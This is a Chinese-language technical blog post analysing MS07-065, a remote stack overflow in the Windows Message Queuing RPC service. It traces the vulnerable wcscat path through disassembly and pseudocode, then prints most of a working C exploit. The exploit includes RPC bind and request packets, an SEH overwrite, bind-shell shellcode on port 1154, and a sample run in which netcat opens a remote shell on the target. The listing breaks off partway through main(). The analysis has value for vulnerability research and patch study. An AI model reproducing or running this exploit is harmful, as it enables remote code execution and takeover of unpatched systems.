MS07-065 Message Queuing Service RPC远程溢出分析

    [雨 December 17, 2007 17:25 | by ]
Author: axis
Date: 2007-12-17
Team: http://www.ph4nt0m.org
微软的补丁链接
http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx

根据ZDI的漏洞描述:
The specific flaw exists in the RPC interface defined on port 2103 with
UUID fdb3a030-065f-11d1-bb9b-00a024ea5525. During the processing of
opnum 0x06 the service copies user-supplied information into a fixed
length stack buffer. Sending at least 300 bytes will trigger a stack
based buffer overflow due to a vulnerable wcscat() call. Exploitation
of this issue can result in arbitrary code execution.

漏洞是在UUID fdb3a030-065f-11d1-bb9b-00a024ea5525 的第6个调用引起的。最终通
过一个 wcscat()的拷贝造成一个栈溢出.

查找了一下关于这个接口的一些定义

The Message Queuing service (msmq) runs RPC services, listening on the
ncacn_ip_tcp transport. By default, the msmq services opens 4 TCP ports
[81], including one or several of 2101/tcp, 2103/tcp, 2105/tcp and 2107/tcp.

Quotation
The mqqm.dll (Windows NT MQ Queue Manager) DLL, loaded in the mqsvc.exe
process, contains the following RPC services:
fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
76d12b80-3467-11d3-91ff-0090272f9ea3 v1.0
1088a980-eae5-11d0-8d9b-00a02453c337 v1.0
5b5b3580-b0e0-11d1-b92d-0060081e87f0 v1.0
41208ee0-e970-11d1-9b9e-00e02c064c39 v1.0
Table 4.49. qmcomm operations
Interface      Operation number       Operation name
fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0: qmcomm            
        0x00    QMOpenQueue
        0x01    QMGetRemoteQueueName
        0x02    QMOpenRemoteQueue
        0x03    QMCloseRemoteQueueContext
        0x04    QMCreateRemoteCursor
        0x05    QMSendMessageInternal
        0x06    QMCreateObjectInternal


事实上,这个服务运行在2101、2103、2105、2107端口,根据我后来的结果可以看到,这些端口都能够直接溢出,这个漏洞被微软标记为important,因为在2003偷偷修复了,在xp和2000 professional 版本上,这个漏洞利用时候需要验证用户密码,只有在2000 server上,才能够无须身 份验证的触发溢出。

Windows默认是没有装这个服务的,要安装这个服务可以在添加删除程序里,选择添加 windows组件。 如果是英文版的系统,那么这里可能叫做 Message Queuing 安装完之后,可以通过 net start msmq  来启动服务。服务的进程是 mqsvc.exe,  而服务是在 mqqm.dll 中,所以我们可以反汇编这个dll文件用IDA反汇编mqqm.dll后,用mida插件逆向出RPC调用
导出IDL文件后,可以看到函数结构如下:
/* opcode: 0x06, address: 0x613B5F03 */
long  _QMCreateObjectInternal (
[in] long arg_1,
[in][string] wchar_t * arg_2,
[in][range(0,524288)] long arg_3,
[in][unique][size_is(arg_3)] char * arg_4,
[in][range(1,128)] long arg_5,
[in][size_is(arg_5)] long arg_6[],
[in][size_is(arg_5)] struct struct_4 arg_7[]
);


这个函数结构暂时先不管他,也可以自己重新构造了一个IDL文件. 通过IDA看 _QMCreateObjectInternal 函数,没过多久就看出了问题所在 在 QMCreatePrivateQueue 中的 ReplaceDNSNameWithNetBiosName 中,没有对输入进行充分检查,wcscat()导致了一个栈溢出。
; int __cdecl ReplaceDNSNameWithNetBiosName(wchar_t *Str, wchar_t *Dest)
?ReplaceDNSNameWithNetBiosName@@YAXPBGPAG@Z proc near
Str= dword ptr  4
Dest= dword ptr  8
push    esi
push    5Ch             ; Ch
push    [esp+8+Str]     ; Str
call    ds:__imp__wcschr
pop     ecx
mov     esi, eax
pop     ecx
push    ?g_szMachineName@@3PAGA ; Source
push    [esp+8+Dest]    ; Dest
call    ds:__imp__wcscpy
pop     ecx
pop     ecx
push    esi             ; Source
push    [esp+8+Dest]    ; Dest
call    ds:__imp__wcscat           // 溢出
pop     ecx
pop     ecx
pop     esi
retn
?ReplaceDNSNameWithNetBiosName@@YAXPBGPAG@Z endp


伪代码为:
wchar_t *__cdecl ReplaceDNSNameWithNetBiosName(wchar_t *Str, wchar_t *Dest)
{
  wchar_t *v3; // esi@1
  v3 = _wcschr(Str, 0x5Cu);
  _wcscpy(Dest, g_szMachineName);
  return _wcscat(Dest, v3);
}


这里我们后面再回过头来看.那么,函数调用是这样的:

_QMCreateObjectInternal
           |---------------QMCreatePrivateQueue

|-------------------ReplaceDNSNameWithNetBiosName  

_QMCreateObjectInternal的伪代码为:
signed int __thiscall QMCreateObjectInternal(struct _RTL_CRITICAL_SECTION
*this, RPC_BINDING_HANDLE Binding, unsigned int Type, wchar_t *Str, int a5,
int a6, int a7, int a8, int a9)
{
  __int32 v10; // edi@6
  __int32 v11; // eax@7
  int v12; // ST18_4@9
  struct _RTL_CRITICAL_SECTION *v13; // [sp+4h] [bp-10h]@1
  int v14; // [sp+10h] [bp-4h]@4
  v13 = this;
  if ( a5 && !a6 )
  {
    LogMsgHR(-1072824314, off_6B27271C, 0x125u);
    return -1072824314;
  }
  v13 = &qmcmd_cs;
  EnterCriticalSection(&qmcmd_cs);
  v14 = 0;
  if ( Type == 1 )
  {
    v12 = 1;
    goto LABEL_14;
  }
  if ( Type == 2 )
  {
    Type = 0;
    v11 = I_RpcBindingInqTransportType(Binding, &Type);
    if ( v11 )
      goto LABEL_20;
    if ( Type == 4 )
    {
      v12 = 0;
LABEL_14:
      v10 = CQPrivate__QMCreatePrivateQueue(Str, a5, a6, a7, a8, a9, v12);
      goto LABEL_15;
    }
    if ( v11 )
LABEL_20:
      LogMsgRPCStatus(v11, off_6B27271C, 0x28u);
    LeaveCriticalSection(&qmcmd_cs);
    return -1072824283;
  }
  v10 = -1072824319;
LABEL_15:
  if ( v10 < 0 )
    LogMsgHR(v10, off_6B27271C, 0x32u);
  LeaveCriticalSection(&qmcmd_cs);
  return v10;
}

================= 这是华丽的分割线 ===============================

首先要调用到 QMCreatePrivateQueue . 我们看到以下是依次是 _QMCreateObjectInternal的六个参数
Type= dword ptr  0Ch
Str= dword ptr  10h
arg_C= dword ptr  14h
arg_10= dword ptr  18h
arg_14= dword ptr  1Ch
arg_18= dword ptr  20h
arg_1C= dword ptr  24h

看以下代码片段
loc_6B22555B:           ; CCriticalSection qmcmd_cs
mov     esi, offset ?qmcmd_cs@@3VCCriticalSection@@A
push    esi             ; lpCriticalSection
mov     [ebp+var_10], esi
call    ds:__imp__EnterCriticalSection@4 ; EnterCriticalSection(x)
mov     eax, [ebp+Type]
mov     [ebp+var_4], ebx
dec     eax
jz      short loc_6B2255C1

在代码中,如果eax为1,dec eax后条件为真,会跳转到QMCreatePrivateQueue 去执行而eax是由mov  eax, [ebp+Type]传入的

所以要让流程走到QMCreatePrivateQueue
_QMCreateObjectInternal的第一个参数必须是为0x00000001

以下是 QMCreatePrivateQueue的调用
loc_6B2255C3:           ; int
push    [ebp+arg_1C]
mov     ecx, offset ?g_QPrivate@@3VCQPrivate@@A ; CQPrivate g_QPrivate
push    [ebp+arg_18]    ; int
push    [ebp+arg_14]    ; int
push    [ebp+arg_10]    ; int
push    [ebp+arg_C]     ; int
push    [ebp+Str]       ; Str
call
?QMCreatePrivateQueue@CQPrivate@@QAEJPBGKPAXKQAKQAUtagPROPVARIANT@@H@Z ;
CQPrivate::QMCreatePrivateQueue(ushort const *,ulong,void *,ulong,ulong *
const,tagPROPVARIANT * const,int)


实际上,我们在后面可以看到,漏洞是由于QMCreatePrivateQueue的第一个参数,也就
是_QMCreateObjectInternal的第二个参数所造成的。进入QMCreatePrivateQueue 之后,我们要调用ReplaceDNSNameWithNetBiosName.
以下是代码片段:

.text:6B2178A9                 mov     eax, offset sub_6B25BE64
.text:6B2178AE                 call    __EH_prolog
.text:6B2178B3                 sub     esp, 138h
.text:6B2178B9                 push    ebx
.text:6B2178BA                 push    esi
.text:6B2178BB                 mov     esi, [ebp+8]
.text:6B2178BE                 lea     eax, [ebp-1Ch]
.text:6B2178C1                 push    edi
.text:6B2178C2                 push    eax             ; int
.text:6B2178C3                 mov     [ebp-18h], ecx
.text:6B2178C6                 push    esi             ; Source
.text:6B2178C7                 call
?IsPathnameForLocalMachine@@YAHPBGPAH@Z ; IsPathnameForLocalMachine(ushort
const *,int *)
.text:6B2178CC                 xor     ebx, ebx              ; ebx 清0
.text:6B2178CE                 pop     ecx
.text:6B2178CF                 cmp     eax, ebx      ; 比较ispath函数的返回

.text:6B2178D1                 pop     ecx
.text:6B2178D2                 jnz     short loc_6B2178EC     ; 这里有个判断


.text:6B2178EC                 cmp     [ebp-1Ch], ebx    ; 这里有个判断
.text:6B2178EF                 jz      short loc_6B217906
.text:6B2178F1                 lea     eax, [ebp-144h]     ; 在栈上
.text:6B2178F7                 push    eax             ; Dest
.text:6B2178F8                 push    esi             ; Str   我们传入的参

.text:6B2178F9                 call
?ReplaceDNSNameWithNetBiosName@@YAXPBGPAG@Z ;
ReplaceDNSNameWithNetBiosName(ushort const *,ushort *)

要走到 ReplaceDNSNameWithNetBiosName ,就需要先绕过 IsPathnameForLocalMachine
这个函数。 我在绕过这个函数上走了很多弯路,花了许多功夫.看看IsPathnameForLocalMachine函数:
中间分析过程很多,这里我就拿重要的说
mov     eax, offset sub_6B25D54C
call    __EH_prolog
sub     esp, 204h
push    ebx
push    esi
lea     eax, [ebp+String1]
push    edi
push    eax             ; Dest
push    [ebp+Source]    ; Source
call    ?ExtractMachineName@@YAXPBGPAG@Z ; ExtractMachineName(ushort const
*,ushort *)    
mov     eax, [ebp+arg_4]
pop     ecx
pop     ecx
mov     esi, ds:__imp__CompareStringW@24 ; CompareStringW(x,x,x,x,x,x)
and     dword ptr [eax], 0
push    0FFFFFFFFh      ; cchCount2
push    ?g_szMachineName@@3PAGA ; lpString2
lea     eax, [ebp+String1]
mov     edi, 800h
push    0FFFFFFFFh      ; cchCount1
push    eax             ; lpString1
push    1               ; dwCmpFlags
push    edi             ; Locale
call    esi ; CompareStringW(x,x,x,x,x,x) ; CompareStringW(x,x,x,x,x,x)
dec     eax
dec     eax
jnz     short loc_6B2344E9
ExtractMachineName(ushort const *,ushort *)  

这个函数把\x5c 就是斜杠前的名字,就是机器名拷贝到某处,所以我们的传入参数里要有斜杠。然后CompareStringW(x,x,x,x,x,x) 函数,把我们传入的斜杠前的那部分和 机器名比较,这里机器名是通过
push    ?g_szMachineName@@3PAGA ; lpString2 取得的,所以是一个定值.对比完后,我们要让返回值不能为2,因为要跳转到下面的地方:
loc_6B2344E9:
lea     eax, [ebp+String1]
push    2Eh             ; Ch
push    eax             ; Str
call    ds:__imp__wcschr
pop     ecx
test    eax, eax
pop     ecx
jz      loc_6B2345DD

这里会把刚才斜杠前的那部分拿来比较,看中间有没有点,我们要让跳转条件非真,所
以我们的传入参数中要带一个“.”  就是\x2e
然后我们控制流程来到
push    ?g_szMachineName@@3PAGA ; Str
mov     ebx, ds:__imp__wcslen
call    ebx ; __imp__wcslen
pop     ecx
push    eax             ; cchCount2
mov     eax, ?g_szMachineName@@3PAGA ; ushort * g_szMachineName
push    eax             ; lpString2
push    eax             ; Str
call    ebx ; __imp__wcslen
pop     ecx
push    eax             ; cchCount1
lea     eax, [ebp+String1]
push    eax             ; lpString1
push    1               ; dwCmpFlags
push    edi             ; Locale
call    esi ; CompareStringW(x,x,x,x,x,x) ; CompareStringW(x,x,x,x,x,x)
dec     eax
dec     eax
jnz     loc_6B2345DD

这里再次把机器名和我们传入的参数比较了一次, 这时候要让跳转条件不成立,流程继续走到

.text:6B234531                 push    ?g_szMachineName@@3PAGA ; Str
.text:6B234537                 call    ebx ; __imp__wcslen
.text:6B234539                 cmp     [ebp+eax*2+String1], 2Eh
.text:6B234542                 pop     ecx
.text:6B234543                 jnz     loc_6B2345DD
.text:6B234549                 mov     eax,
?g_szComputerDnsName@@3V?$AP@G@@A ; AP<ushort> g_szComputerDnsName
.text:6B23454E                 test    eax, eax
.text:6B234550                 jz      short loc_6B234570
.text:6B234552                 lea     ecx, [ebp+String1]
.text:6B234558                 push    ecx             ; Str2
.text:6B234559                 push    eax             ; Str1
.text:6B23455A                 call    ds:__imp___wcsicmp  ;比较字符串
.text:6B234560                 pop     ecx
.text:6B234561                 test    eax, eax
.text:6B234563                 pop     ecx
.text:6B234564                 jnz     short loc_6B234570   ; 这里不能跳转
.text:6B234566                 mov     ecx, [ebp+arg_4]
.text:6B234569                 push    1
.text:6B23456B                 pop     eax
.text:6B23456C                 mov     [ecx], eax
.text:6B23456E                 jmp     short loc_6B2345DF

注意这里
mov     eax, ?g_szComputerDnsName@@3V?$AP@G@@A ; AP<ushort>
g_szComputerDnsName
test    eax, eax
jz      short loc_6B234570

这个dns name是从机器中取的

.text:6B234552                 lea     ecx, [ebp+String1]
.text:6B234558                 push    ecx             ; Str2
.text:6B234559                 push    eax             ; Str1
.text:6B23455A                 call    ds:__imp___wcsicmp

然后马上比较两个串是否相同。根据我们的流程需要,最后要走到

mov     ecx, [ebp+arg_4]
push    1
pop     eax
mov     [ecx], eax
jmp     short loc_6B2345DF

然后这个天杀的 IsPathnameForLocalMachine 就总算返回为真了,而且我们同时绕过了以下两处的判断:

.text:6B2178CF                 cmp     eax, ebx      ; 比较ispath函数的返回

.text:6B2178D1                 pop     ecx
.text:6B2178D2                 jnz     short loc_6B2178EC     ; 这里有个判断
.text:6B2178EC                 cmp     [ebp-1Ch], ebx    ; 这里有个判断
.text:6B2178EF                 jz      short loc_6B217906

从而让函数流程顺利的执行到了 ReplaceDNSNameWithNetBiosName
小结下绕过 IsPathnameForLocalMachine 的条件:
1.      要发送个 目标机器的dnsname 加上 一个斜杠 \
2.      要是unicode字符串发送dnsname

实际上从 ReplaceDNSNameWithNetBiosName 这个函数的名字也可以看出来,是要把DNS
name替换为 机器名。

同时也可以看出来这个漏洞的利用条件: 需要知道目标机器的dnsname。
一般如果机器在域里面,那就是域后缀。
如下图:

我的机器名是: a-dda41398f44f4
DNS后缀是: .fuck

注意这个“.”很重要,在触发条件中是一定要的。

================= 这是要抓狂的分割线 ============================

现在回过头来看 ReplaceDNSNameWithNetBiosName 的代码:

push    esi
push    5Ch             ; Ch
push    [esp+8+Str]     ; Str
call    ds:__imp__wcschr
pop     ecx
mov     esi, eax
pop     ecx
push    ?g_szMachineName@@3PAGA ; Source
push    [esp+8+Dest]    ; Dest
call    ds:__imp__wcscpy
pop     ecx
pop     ecx
push    esi             ; Source
push    [esp+8+Dest]    ; Dest
call    ds:__imp__wcscat


就是把 \ 后面的字符串,wcscat到 机器名后面, 而这个拷贝发生在栈上,没有做长度检查,发生了栈溢出。

最后我使用覆盖seh 的方法利用成功发送超过2000 bytes字节的stub,保证覆盖到栈底触发异常,然后call ebx执行shellcode

下面是一个装B的exploit,只适用于我的机器(机器名是a-dda41398f44f4 , dns 后缀
是.fuck ),如果你要修改,需要考虑到机器名的不同带来的影响,要重新计算
payload长度值. 为啥说这是装B的exploit呢,因为明明有更清晰的exploit写法我不
写,要写个可以忽悠很多人的。所以说大家要是以前看到过这种exploit写法又看不
懂,那不要灰心,那个人只是和我一样在装B而已!

Exploit运行效果:

Shellcode 使用exitthread退出线程,则可以反复溢出,如果使用seh退出,则会反复
执行你的shellcode
================== 这是装B的分割线 =============================
Quotation
/*
Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
by axis
http://www.ph4nt0m.org
you should know the dnsname of target to trigger this vuln
  the service runs on port 2103/2105/2107
D:\soft\develop\MyProjects\temp\Debug>temp.exe -h 192.168.152.100 -p 2103
--------------------------------------------------------------------------
-== Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) ==-
-== code by axis@ph4nt0m ==-
-== Http://www.ph4nt0m.org ==-
-== Tested against Windows 2000 server SP4 ==-
--------------------------------------------------------------------------
[+] Attacking default port 2103
[*]Sending our Payload, Good Luck! ^_^
[*]Sending RPC Bind String!
[*]Sending RPC Request Now!
D:\soft\develop\MyProjects\temp\Debug>
D:\>nc -vv -n 192.168.152.100 1154
(UNKNOWN) [192.168.152.100] 1154 (?) open: unknown socket error
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>exit
exit
sent 5, rcvd 109: NOTSOCK
D:\>
*/
#include
#include
#include
#include
#include
#pragma comment(lib,"ws2_32")
// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
char bind_str[] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 };
// RPC Request  Opnum: 0x06  
char request_1[] = {
0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00,
0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
0x61, 0x00, 0x2d, 0x00, 0x64, 0x00, 0x64, 0x00,  // target"s dns name
(unicode)
0x61, 0x00, 0x34, 0x00, 0x31, 0x00, 0x33, 0x00,
0x39, 0x00, 0x38, 0x00, 0x66, 0x00, 0x34, 0x00,
0x34, 0x00, 0x66, 0x00, 0x34, 0x00, 0x2e, 0x00,
0x66, 0x00, 0x75, 0x00, 0x63, 0x00, 0x6b, 0x00,
0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0,     // \xeb\x06\x42\x42
jmpcode
0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9,     //  overwrite seh ; call
ebx
0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73,     //  bindshell on port
1154, metasploit shellcode
0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc,
0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b,
0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6,
0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83,
0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83,
0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3,
0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43,
0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6,
0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83,
0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e,
0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6,
0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1,
0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f,
0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c,
0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea,
0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6,
0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2,
0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f,
0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea,
0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1,
0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1,
0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1,
0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45,
0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d,
0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d,
0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb,
0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6,
0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44,
0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4,
0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67,
0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8,
0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c,
0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8,
0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31,
0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5,
0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3,
0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87,
0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5,
0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6,
0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c,
0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82,
0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41};


char request_2[] = {
0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00,
0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };

void usage(char *argv) {
   printf(" Usage:   %s -h 127.0.0.1 (Universal exploit)\n",argv);
   printf("          %s -h host [-p port]\n",argv);
   printf(" Targets:\n");
   exit(1);    
}
/************* TCP connect *************************/

void Disconnect(SOCKET s);
// ripped from isno
int Make_Connection(char *address,int port,int timeout)
{
    struct sockaddr_in target;
    SOCKET s;
    int i;
    DWORD bf;
    fd_set wd;
    struct timeval tv;
    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0)
        return -1;
    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    if(target.sin_addr.s_addr==0)
    {
        closesocket(s);
        return -2;
    }
    target.sin_port = htons((short)port);
    bf = 1;
    ioctlsocket(s,FIONBIO,&bf);
    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target));
    if((i=select(s+1,0,&wd,0,&tv))==(-1))
    {
        closesocket(s);
        return -3;
    }
    if(i==0)
    {
        closesocket(s);
        return -4;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
    if((bf!=0)||(i!=sizeof(int)))
    {
        closesocket(s);
        return -5;
    }
    ioctlsocket(s,FIONBIO,&bf);
    return s;
}
void Disconnect(SOCKET s)
{
        closesocket(s);
        WSACleanup();

}

/****************************************************/

int main(int argc, char * argv[]){
   unsigned char * target = NULL;
   int port = 2103;
   int i;
   int  ret;
   char buffer[6000] = {0};
   SOCKET  s;
   WSADATA WSAData;
printf("-------------------------------------------------------------------­-
------\n");
   printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065)
==-\n");
   printf("-== code by axis@ph4nt0m ==-\n");
   printf("-== Http://www.ph4nt0m.org ==-\n");
   printf("-== Tested against Windows 2000 server SP4 ==-\n");
printf("-------------------------------------------------------------------­-
------\n\n");
    if (argc==1) usage(argv[0]); //Handle parameters
     for(i=1;i      if ( (argv[i][0]=="-") ) {
         switch (argv[i][1]) {
         case "h":
            target=(unsigned char *)argv[i+1];
            break;
